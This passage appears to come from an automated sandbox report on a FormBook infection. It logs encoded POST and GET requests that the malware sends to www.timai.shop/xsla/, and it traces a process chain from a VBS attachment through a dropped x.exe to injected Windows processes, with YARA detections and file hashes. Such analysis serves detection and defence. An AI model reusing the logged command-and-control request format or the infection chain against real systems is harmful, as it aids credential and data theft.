                                                Dec 17, 2024 03:42:05.228606939 CET1236INData Raw: 2d 32 2e 35 2d 32 2e 35 48 39 2e 31 36 63 2d 31 2e 33 33 2c 30 2d 32 2e 35 2c 31 2e 31 37 2d 32 2e 35 2c 32 2e 35 56 35 48 32 2e 35 20 43 31 2e 31 37 2c 35 2c 30 2c 36 2e 31 36 2c 30 2c 37 2e 34 39 76 34 2e 31 36 68 32 36 2e 36 34 56 37 2e 34 39
                                                Data Ascii: -2.5-2.5H9.16c-1.33,0-2.5,1.17-2.5,2.5V5H2.5 C1.17,5,0,6.16,0,7.49v4.16h26.64V7.49C26.64,6.16,25.48,5,24.14,5z M16.65,5H9.99V3.33h6.66V5z"/></symbol><symbol id="fs-icon" viewBox="0 0 60 60"><path d="M0,59.4V60h14.9V48.3l9.9-4V60H30V40.7l9.9
                                                Dec 17, 2024 03:42:05.347732067 CET1236INData Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 33 3e 4e 6f 2c 20 74 68 69 73 20 69 73 20 6e 6f 74 20 6d 79 20 64 6f 6d 61 69 6e 2e 3c 2f 68 33 3e 0a 3c 70 3e 42 75 74 20 49 20 77 6f 75 6c 64 20 6c 69 6b 65 20 69 74 20 74 6f 20 62 65 2e 3c 2f 70 3e 0a 3c 61 20
                                                Data Ascii: ></div><h3>No, this is not my domain.</h3><p>But I would like it to be.</p><a class="choice-link no" href="https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-page&utm_medium=referral&utm_source


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                17192.168.2.54995718.166.177.211804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:42:11.776240110 CET634OUTPOST /xsla/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.timai.shop
                                                Origin: http://www.timai.shop
                                                Referer: http://www.timai.shop/xsla/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 73 71 5a 67 5a 71 4e 66 55 6b 61 64 6e 53 4a 4c 55 71 2f 68 42 2f 4e 37 6e 42 35 30 30 4f 49 54 6d 78 67 6c 76 4a 38 6e 39 66 64 33 50 6a 47 73 75 63 72 78 71 44 45 56 6b 47 57 56 55 42 6e 35 66 54 6d 4c 42 32 41 39 44 6f 67 46 77 41 34 41 59 51 68 77 70 47 46 63 4b 77 79 51 30 61 77 71 32 42 57 6d 66 62 39 6d 78 33 55 6a 62 65 70 72 49 76 64 77 52 59 70 46 5a 72 35 45 71 45 62 32 6c 32 4c 31 69 41 71 72 72 4f 30 77 75 77 4a 6b 4d 35 33 7a 31 68 4a 34 4e 69 68 65 63 43 55 71 72 65 79 72 42 71 4c 64 7a 33 76 52 6c 44 45 73 6f 6b 63 63 2b 68 32 33 49 4e 6b 50 75 4f 49 33 67 4d 75 73 51 77 4d 3d
                                                Data Ascii: -V8=sqZgZqNfUkadnSJLUq/hB/N7nB500OITmxglvJ8n9fd3PjGsucrxqDEVkGWVUBn5fTmLB2A9DogFwA4AYQhwpGFcKwyQ0awq2BWmfb9mx3UjbeprIvdwRYpFZr5EqEb2l2L1iAqrrO0wuwJkM53z1hJ4NihecCUqreyrBqLdz3vRlDEsokcc+h23INkPuOI3gMusQwM=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                18192.168.2.54996318.166.177.211804444C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:42:14.435077906 CET654OUTPOST /xsla/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.timai.shop
                                                Origin: http://www.timai.shop
                                                Referer: http://www.timai.shop/xsla/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 73 71 5a 67 5a 71 4e 66 55 6b 61 64 6b 79 35 4c 5a 70 58 68 57 76 4e 34 6b 42 35 30 39 75 49 66 6d 32 6f 6c 76 4d 64 36 39 70 4e 33 50 48 43 73 70 5a 48 78 6d 6a 45 56 72 6d 58 64 51 42 6e 77 66 54 72 6f 42 32 73 39 44 72 63 46 77 42 49 41 59 44 49 43 6f 57 46 53 48 51 79 53 37 36 77 71 32 42 57 6d 66 62 35 63 78 33 4d 6a 61 75 5a 72 4a 4b 70 33 62 34 70 4b 4f 62 35 45 38 30 62 36 6c 32 4c 58 69 43 54 4d 72 4c 77 77 75 31 31 6b 4d 6f 33 77 6d 42 4a 36 41 43 67 36 54 7a 39 68 75 75 50 72 4a 62 53 67 6a 57 48 71 74 56 31 47 79 47 55 30 74 42 61 50 59 65 73 34 2f 2b 70 65 36 76 2b 63 4f 6e 5a 6a 59 47 4c 7a 6d 65 2f 50 4f 55 61 61 41 70 5a 30 6c 59 4c 63
                                                Data Ascii: -V8=sqZgZqNfUkadky5LZpXhWvN4kB509uIfm2olvMd69pN3PHCspZHxmjEVrmXdQBnwfTroB2s9DrcFwBIAYDICoWFSHQyS76wq2BWmfb5cx3MjauZrJKp3b4pKOb5E80b6l2LXiCTMrLwwu11kMo3wmBJ6ACg6Tz9huuPrJbSgjWHqtV1GyGU0tBaPYes4/+pe6v+cOnZjYGLzme/POUaaApZ0lYLc
                                                Dec 17, 2024 03:42:16.014107943 CET289INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.54997418.166.177.21180
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:42:17.451250076 CET1671OUTPOST /xsla/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.timai.shop
                                                Origin: http://www.timai.shop
                                                Referer: http://www.timai.shop/xsla/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 73 71 5a 67 5a 71 4e 66 55 6b 61 64 6b 79 35 4c 5a 70 58 68 57 76 4e 34 6b 42 35 30 39 75 49 66 6d 32 6f 6c 76 4d 64 36 39 70 46 33 49 79 57 73 76 36 2f 78 6c 6a 45 56 31 57 58 65 51 42 6d 69 66 58 4f 68 42 32 51 79 44 74 59 46 78 6e 30 41 50 69 49 43 6a 57 46 53 4f 77 79 58 30 61 78 33 32 42 6e 76 66 62 4a 63 78 33 4d 6a 61 73 42 72 4e 66 64 33 49 6f 70 46 5a 72 35 49 71 45 62 57 6c 33 6a 39 69 43 57 37 72 59 49 77 75 56 46 6b 4e 61 66 77 38 42 4a 38 42 43 67 69 54 7a 68 75 75 74 71 53 4a 62 6d 65 6a 56 58 71 75 7a 67 64 33 33 64 6f 75 58 47 4e 66 35 55 64 75 36 39 43 6e 73 57 66 43 56 68 53 64 55 48 64 6f 37 33 67 44 57 6e 68 63 50 4a 4f 67 4f 66 63 44 79 48 6d 78 38 5a 75 67 4b 4c 36 69 64 49 69 48 7a 79 36 6d 43 39 39 41 70 4a 67 42 50 66 33 4a 76 35 72 46 51 57 63 6c 58 71 43 43 56 51 45 34 2f 47 6d 35 57 79 30 65 58 43 34 45 50 62 6c 6a 69 52 7a 36 50 39 63 72 30 61 58 65 57 46 44 4e 63 65 4c 66 64 4e 79 4d 67 49 32 63 44 62 57 39 64 2b 64 2b 37 74 6d 76 34 4e 39 70 42 49 2b 30 2f [TRUNCATED]
                                                Data Ascii: -V8=sqZgZqNfUkadky5LZpXhWvN4kB509uIfm2olvMd69pF3IyWsv6/xljEV1WXeQBmifXOhB2QyDtYFxn0APiICjWFSOwyX0ax32BnvfbJcx3MjasBrNfd3IopFZr5IqEbWl3j9iCW7rYIwuVFkNafw8BJ8BCgiTzhuutqSJbmejVXquzgd33douXGNf5Udu69CnsWfCVhSdUHdo73gDWnhcPJOgOfcDyHmx8ZugKL6idIiHzy6mC99ApJgBPf3Jv5rFQWclXqCCVQE4/Gm5Wy0eXC4EPbljiRz6P9cr0aXeWFDNceLfdNyMgI2cDbW9d+d+7tmv4N9pBI+0/4HCNBAkroSdEgZQiqcLBeyYt8gjkNCfndduSaSxuHqBmIt4sO7yGp0QeUWXSptPuyVLiNMKwG4QU1p3n4VOSiTaAtwU188XkWXHjZyaqDswS1MI+cBTEcwYDf6mb3G82peO111pkmkVIOw0TPqijLy8tsbrV0SSVBv9S3xXE7JOWwl+BJ25FBVTP8XAm1RMtPBqKAI69ZZ1JbUbitfS05AfseHy8AFjaDZ/bGRVPUAwvFcEvethr35Yr/K0jAMX+dicDv6thS0lew80Ff4IKk70M5xY453PlLp9+CIcqXVOjhauoK2vV7e8w/4GEiqq6cxbcc02RGIxbkC4rLyZHhHsfpjXUcwV7hRqS2Y9HKB5/6kb1y+zRWVqq9jDvtn28osjmiH9j1WhzP0ygddmA1hJ4/zxom57XshllEbaBCTl9fNRAKwdthfsHdpvA4VgNV0TZZ4ceDnJWcaic+Ws42okiCkhXOGcA892g5wreZH241ni9yoRoYutN9macodUZtLicEEhsyW2ItpPxsGF15GwwseogV6uj9orMnjzZZvRcwkOJTYFRDm5jSFV56lf34c6spgEX0ltc92kft9CN5ZQEji949NthJXLQDkXei8MmAdh3EkO6NPrhLN6/3tFsSd7o2NcKa/jmojelH/9XEu2QNSKl0uIkc6 [TRUNCATED]
                                                Dec 17, 2024 03:42:19.036968946 CET289INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.54998018.166.177.21180
                                                TimestampBytes transferredDirectionData
                                                Dec 17, 2024 03:42:20.107106924 CET383OUTGET /xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.timai.shop
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:42:21.676249027 CET289INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:21:40:06
                                                Start date:16/12/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs"
                                                Imagebase:0x7ff74d750000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:21:40:11
                                                Start date:16/12/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                Imagebase:0xe80000
                                                File size:335'360 bytes
                                                MD5 hash:D9A430A4C9B06A9C5F69147498335567
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 55%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:21:40:12
                                                Start date:16/12/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                Imagebase:0xdb0000
                                                File size:56'368 bytes
                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:21:40:32
                                                Start date:16/12/2024
                                                Path:C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe"
                                                Imagebase:0xf90000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:6
                                                Start time:21:40:33
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\chkntfs.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                Imagebase:0x1a0000
                                                File size:19'968 bytes
                                                MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3303203962.0000000002370000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3304393430.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3304322824.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                General

                                                Target ID:7
                                                Start time:21:40:46
                                                Start date:16/12/2024
                                                Path:C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe"
                                                Imagebase:0xf90000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3306103928.0000000005540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                General

                                                Target ID:9
                                                Start time:21:40:58
                                                Start date:16/12/2024
                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                Imagebase:0x7ff79f9e0000
                                                File size:676'768 bytes
                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Disassembly

                                                No disassembly